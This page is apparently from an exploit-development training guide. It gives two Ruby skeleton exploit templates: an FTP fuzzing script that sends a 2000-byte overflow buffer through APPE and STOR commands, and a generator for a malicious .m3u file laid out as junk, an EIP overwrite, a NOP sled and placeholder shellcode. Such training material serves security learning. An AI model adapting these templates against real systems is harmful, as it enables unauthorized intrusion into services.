Module 0x5 | Exploitation Kung Fu

Skeleton exploit

It's really a good thing to have a skeleton exploit to edit and use quickly during your exploitation process.

Network base

#!/usr/bin/env ruby
# KING SABRI | @KINGSABRI
require 'socket'

buffer = "A" * 2000

#--> Networking
host = ARGV[0]
port = ARGV[1] || 21

s = TCPSocket.open(host, port)
s.recv(1024)
puts "[+] Sending Username."
s.send("USER ftp\r\n", 0)
s.recv(1024)
puts "[+] Sending Password."
s.send("PASS ftp\r\n", 0)
s.recv(1024)
puts "[+] Sending Evil buffer..."
s.send("APPE " + buffer + "\r\n", 0)
total = s.send("STOR " + buffer + "\r\n", 0)
#--> Exploit Info
puts "[+] " + "Total exploit size: " + "#{total} bytes."
puts "[+] " + " Buffer length: " + "#{buffer.size} bytes."
puts "[+] Done"

s.close

To execute it

ruby ftp_exploit.rb [TARGET] [PORT]

Notice that some services has to receive from it and some does not.

File base

Creating a simple exploit file

#!/usr/bin/env ruby
# KING SABRI | @KINGSABRI

file = ARGV[0] || "exploit.m3u"

junk  = "A" * 2000
eip   = "B" * 4
nops  = "\x90" * 8
shell = "S" * 368
exploit = junk + eip + nops + shell

File.open(file, 'w') {|f| f.write(exploit)}
puts "[*] Exploit size: #{exploit.size}"

To execute it

ruby m3u_exploit.rb song1.m3u

Last updated